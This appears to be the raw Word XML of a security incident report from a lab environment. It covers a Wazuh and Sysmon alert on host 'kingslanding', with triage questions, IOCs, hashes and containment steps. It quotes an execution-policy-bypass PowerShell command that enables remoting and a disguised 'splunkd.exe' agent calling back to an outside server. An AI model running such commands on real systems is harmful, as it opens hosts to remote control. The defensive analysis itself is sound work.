        <w:t>Target Filename: C:\Users\vagrant\AppData\Local\Temp\3\__PSScriptPolicyTest_mwnd3bsv.ven.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E9F67C" w14:textId="2B048F16" w:rsidR="023B20B9" w:rsidRPr="00016EF6" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Rule ID: 92213</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5231AD" w14:textId="02A940D2" w:rsidR="023B20B9" w:rsidRPr="00016EF6" w:rsidRDefault="023B20B9" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="nil"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="system-ui" w:hAnsiTheme="minorHAnsi" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A207967" w14:textId="114EEAAD" w:rsidR="00372020" w:rsidRDefault="64E10EA2" w:rsidP="00016EF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="nil"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Triage and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253CC8F2" w14:textId="77777777" w:rsidR="00016EF6" w:rsidRPr="00372020" w:rsidRDefault="00016EF6" w:rsidP="00016EF6"/>
    <w:p w14:paraId="13C956B0" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Description of the Incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F5E14" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">A potential malicious PowerShell execution was detected on the host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>kingslanding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">. The PowerShell script was executed with an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass, which is often used in attacks to circumvent restrictions. Additionally, a script file was created in a temporary directory commonly exploited by malware. The parent process (splunkd.exe) also showed suspicious behavior, indicating possible unauthorized activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E98EB53" w14:textId="2B07696C" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B88A29F" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Initial Detection and Alerting Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D394EF" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Detection Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170599AD" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Sysmon: Logged process creation and file creation events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE53745" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>: Alerted based on predefined detection rules for PowerShell activity and suspicious file creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10863F77" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Alerts Triggered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D7334" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Rule ID 255531: Execution of PowerShell detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579437F" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Rule ID 92213: File created in a directory commonly used by malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F1C0D" w14:textId="2ADE55C9" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C84126A" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Immediate Actions Taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C3315E" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Logged details of the events for analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7849BA36" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Prioritized incident as a Critical (Severity: High) event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79AC5E" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Isolated the host (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>kingslanding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>) for containment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D66AA4" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Scheduled review of dropped files and parent process behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5DCE8" w14:textId="2E8DD30B" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB8AD7C" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Investigative Q&amp;A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE45BF8" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>What is the process being executed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA8FE7A" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>powershell.exe with the command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:br/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -C "Enable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>PSRemoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A376FCD" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Where is the script stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC8F161" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>C:\Users\vagrant\AppData\Local\Temp\3\__PSScriptPolicyTest_mwnd3bsv.ven.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E0CAEB" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Who initiated the process?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D54114" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>User: SEVENKINGDOMS\vagrant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EA6CF" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>What is the parent process?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C2277F" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>C:\Users\Public\splunkd.exe executed with:</w:t>
      </w:r>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:br/>
        <w:t>-server http://192.168.224.150:8888 -group red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5371F3E0" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Are there any hashes associated with the PowerShell process?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5AFD1" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>SHA256: DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056BDCA" w14:textId="11E60A5E" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ABBD88F" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>New Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FA831" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>File Path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9402CA" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>C:\Users\vagrant\AppData\Local\Temp\3\__PSScriptPolicyTest_mwnd3bsv.ven.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623BF8EA" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Hash Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C91AD3" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>SHA1: 6CBCE4A295C163791B60FC23D285E6D84F28EE4C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B16E720" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>MD5: 7353F60B1739074EB17C5F4DDDEFE239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD5B45" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Command Line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9312B8" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -C "Enable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>PSRemoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4226F1" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Parent Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADC960A" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>splunkd.exe with:</w:t>
      </w:r>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:br/>
        <w:t>-server http://192.168.224.150:8888 -group red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B74B0BD" w14:textId="4128628F" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66ACF17D" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Scope and Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B93668" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Host Affected: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00372020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>kingslanding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43690022" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>User Involved: SEVENKINGDOMS\vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36F5B7" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Potential Threats: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D2D66" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Unauthorized PowerShell execution for lateral movement or persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16435336" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File creation in a directory that can enable further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDBF817" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
